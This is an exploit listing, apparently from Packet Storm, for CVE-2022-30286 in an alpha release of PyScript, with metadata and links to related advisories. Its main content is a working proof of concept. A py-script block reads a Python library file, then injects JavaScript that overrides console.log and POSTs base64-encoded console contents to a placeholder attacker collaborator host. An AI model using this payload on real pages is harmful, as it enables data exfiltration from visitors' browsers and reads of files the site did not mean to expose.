Lucene search
Momen EldawakhlyPACKETSTORM:167069HistoryMay 11, 2022 - 12:00 a.m.
PyScript 2022-05-04-Alpha Source Code Disclosure
2022-05-1100:00:00
Momen Eldawakhly
packetstormsecurity.com
172
pyscript source code disclosure
emscripten vmemory
python libraries
cve-2022-30286
ubuntu apache server
EPSS
0.036
Percentile
91.6%
`# Exploit Title: PyScript Remote Emscripten VMemory Python libraries
Source Codes Read
# Date: 5-9-2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://pyscript.net/
# Software Link: https://github.com/pyscript/pyscript
# Version: 2022-05-04-Alpha
# Tested on: Ubuntu Apache Server
# CVE : CVE-2022-30286
<py-script>
x = "CyberGuy"
if x == "CyberGuy":
with open('/lib/python3.10/asyncio/tasks.py') as output:
contents = output.read()
print(contents)
print('<script>console.pylog = console.log; console.logs = []; console.log = function(){ console.logs.push(Array.from(arguments)); console.pylog.apply(console, arguments);fetch("http://YOURburpcollaborator.net/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
</py-script>
`
Related
prion
prion
Code injection
2022-05-09 12:15:00
zdt
zdt
PyScript - Read Remote Python Source Code Vulnerability
2022-05-12 00:00:00
nvd
nvd
CVE-2022-30286
2022-05-09 12:15:09
cvelist
cvelist
CVE-2022-30286
2022-05-09 12:01:36
cve
cve
CVE-2022-30286
2022-05-09 12:15:09
exploitdb
exploitdb
PyScript - Read Remote Python Source Code
2022-05-11 00:00:00